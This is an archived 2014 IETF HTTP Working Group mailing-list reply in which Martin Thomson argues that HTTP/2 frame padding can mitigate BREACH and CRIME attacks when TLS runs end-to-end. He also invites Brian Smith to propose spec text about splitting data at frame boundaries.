- From: Martin Thomson <martin.thomson@gmail.com>
- Date: Wed, 3 Sep 2014 17:25:36 -0700
- To: Brian Smith <brian@briansmith.org>
- Cc: "Roy T. Fielding" <fielding@gbiv.com>, HTTP Working Group <ietf-http-wg@w3.org>
On 3 September 2014 15:59, Brian Smith <brian@briansmith.org> wrote: > It seems like, with the way padding is > currently specified, no endpoint can rely on it to mitigate > BREACH-type attacks, for the reasons I gave. If you use TLS end-to-end, without intermediation, I see no reason that this can't be used to mitigate BREACH (or CRIME) attacks and their ilk. Certainly in cases where translation to HTTP/1.1 occurs, that might not be true. >>> So, we have to assume some implementations will choose to split >>> the data stream at the frame boundary. >> >> Let us be very careful to distinguish between potentially more secure >> because we are providing the necessary tools and more secure even when >> people do the wrong thing. We're not aiming for the latter here. > > Splitting at the frame boundary is not specified as the wrong thing > anywhere in the draft. Nor is sticking your head out of a moving subway carriage. There is probably a line somewhere between that makes sense. If you are willing to provide text, I'm quite likely to accept it.
Received on Thursday, 4 September 2014 00:26:07 UTC